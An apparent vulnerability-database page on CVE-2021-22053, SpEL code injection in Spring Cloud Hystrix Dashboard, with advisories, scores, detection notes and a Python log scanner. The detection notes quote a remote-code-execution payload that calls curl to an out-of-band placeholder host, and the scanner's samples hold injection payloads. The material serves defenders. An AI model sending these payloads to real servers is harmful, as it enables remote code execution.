CVE-2021-22053
Published: 2021-11-19
Priority: P1 82 · CVSS 3.1: 8.8 (high)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
In the wild: exploit available · VulnCheck KEV · Exploited in the wild
EPSS: 12.69% (95.8th percentile)
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vmware | spring_cloud_netflix | — | — |
| vmware | spring_cloud_netflix | >= 2.2.0 < 2.2.10 | 2.2.10 |
Detection & IOCs (extracted from sources)
Command IOC: `T(java.lang.Runtime).getRuntime().exec("curl http://{{interactsh-url}}")`
- Detect HTTP GET requests targeting the /hystrix/ path with semicolon-delimited path parameters containing SpringEL expression syntax (e.g., `__${...}__::.x/`), which is the exploitation pattern for CVE-2021-22053.
- Monitor for out-of-band HTTP callbacks (e.g., via interactsh/canary tokens) triggered by curl or CertUtil user-agents, as the PoC payload exfiltrates via DNS/HTTP interaction.
- Flag requests where the URI path contains the pattern `;a=a/__${` followed by `}__::.x/`, as this is the specific SpEL injection wrapper used in exploitation of this CVE.
- Exploitation requires BOTH spring-cloud-netflix-hystrix-dashboard AND spring-boot-starter-thymeleaf to be present in the application; neither alone is sufficient.
- The vulnerability affects Spring Cloud Netflix Hystrix Dashboard versions prior to 2.2.10 only; patched versions are not susceptible.
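The detection notes above describe two signals in the request path: the exact `;a=a/__${ ... }__::.x/` wrapper, and more generally any semicolon-delimited path parameter under `/hystrix/` that carries SpEL `${...}` syntax. The following Python is an added example written for this page (it is not from the page, the Nuclei template, or any of the cited sources) that applies both rules to access-log lines. The log lines, client addresses and user agents are constructed here for illustration; the script assumes combined-log-format lines and percent-decodes the path twice before matching so that URL-encoded variants of the same request are not missed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Line 1 is normal
# dashboard use, lines 2-3 carry the wrapper from the detection notes (plain and
# URL-encoded), line 4 has generic SpEL in a path parameter, line 5 is unrelated.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Nov/2021:10:00:01 +0000] "GET /hystrix/monitor?stream=http%3A%2F%2Fapp%3A8080%2Factuator%2Fhystrix.stream HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [19/Nov/2021:10:00:02 +0000] "GET /hystrix/monitor;a=a/__${7*7}__::.x/ HTTP/1.1" 500 0 "-" "curl/7.79.1"
10.0.0.7 - - [19/Nov/2021:10:00:03 +0000] "GET /hystrix/monitor%3Ba%3Da/__%24%7B7*7%7D__%3A%3A.x/ HTTP/1.1" 500 0 "-" "python-requests/2.26"
10.0.0.8 - - [19/Nov/2021:10:00:04 +0000] "GET /hystrix/monitor;foo=${1+1} HTTP/1.1" 500 0 "-" "curl/7.79.1"
10.0.0.9 - - [19/Nov/2021:10:00:05 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "kube-probe/1.21"
"""

# Combined log format: client ident user [ts] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rule 1: the exact wrapper quoted in the detection notes for this CVE.
SPECIFIC_WRAPPER_RE = re.compile(r';a=a/__\$\{.*\}__::\.x/')


def normalize_path(target: str) -> str:
    """Drop the query string and percent-decode twice (double-encoding is common)."""
    path = target.split("?", 1)[0]
    return unquote(unquote(path))


def classify_path(target: str):
    """Return a rule name if the request path looks like CVE-2021-22053 exploitation."""
    path = normalize_path(target)
    if "/hystrix/" not in path:
        return None
    if SPECIFIC_WRAPPER_RE.search(path):
        return "specific_wrapper"
    # Rule 2: any matrix parameter (text after the first ';') containing SpEL syntax.
    semi = path.find(";")
    if semi != -1 and "${" in path[semi:]:
        return "spel_in_path_param"
    return None


def scan_log(text: str):
    """Parse each log line and collect those matching either detection rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production parser would count these
        rule = classify_path(m["target"])
        if rule:
            findings.append({
                "client": m["client"],
                "ua": m["ua"],
                "status": int(m["status"]),
                "path": normalize_path(m["target"]),
                "rule": rule,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['rule']:20} {f['client']:10} {f['status']} {f['ua']:22} {f['path']}")
```

The first sample line shows why the query string is stripped before matching: legitimate dashboard traffic passes the stream URL as a query parameter, and only matrix parameters after `;` in the path itself are relevant to this CVE. The user agent is recorded alongside each hit so the out-of-band callback note (curl/CertUtil agents) can be correlated in the same pass.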
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| VulnCheck | — | 8.8 | HIGH | — |
GHSA
Code injection in spring-cloud-netflix-hystrix-dashboard
ghsa · 2021-11-23 · CVE-2021-22053 [HIGH] · CWE-94
Applications using the `spring-cloud-netflix-hystrix-dashboard` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
OSV
Code injection in spring-cloud-netflix-hystrix-dashboard
osv · 2021-11-23 · CVE-2021-22053 [HIGH]
Applications using the `spring-cloud-netflix-hystrix-dashboard` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
VulnCheck
VMware Spring Framework Improper Control of Generation of Code ('Code Injection')
vulncheck · 2021 · CVE-2021-22053 [HIGH] · CVSS 8.8
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
Affected: VMware Spring Framework
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-security-trends-cross-site-scripting/; https://dashboa
No detection rules found.
Nuclei
Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
nuclei · CVE-2021-22053 [HIGH] · CVSS 8.8
Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
Template (truncated as listed on the page):

```yaml
id: CVE-2021-22053

info:
  name: Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
  author: forgedhallpass
  severity: high
  description: |
    Spring Cloud Netflix Hystrix Dashboard prior to version
```
Unit42
Network Security Trends: November 2021 to January 2022
blogs_unit42 · 2022-05-31 · CVSS 9.8 [CRITICAL]
Author: Yue Guan · Published: May 31, 2022
Threat Research Center · Threat Research · Vulnerabilities
Tags: Apache Log4j, Attack analysis, Denial of service, Exploit in Wild, Network security trends
## Executive Summary
Unit 42 researchers continually observe network attacks and search for insights that can assist defenders. Here, we summarize key trends from November 2021 to January 2022. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity distribution. We also classify vulnerabilities to provide a clear view of the prevalence of, for example, cross-site scripting or denial of service.
Cross-site scripting stood out as a commonly used technique. Among around 6,443 newly published vulnerabilities, we found that a large portion (almost 10.6%) still involve this technique. However, by evaluating around 167 million attack sessions and focusing on the latest exploits in the wild, we conclude that remote code execution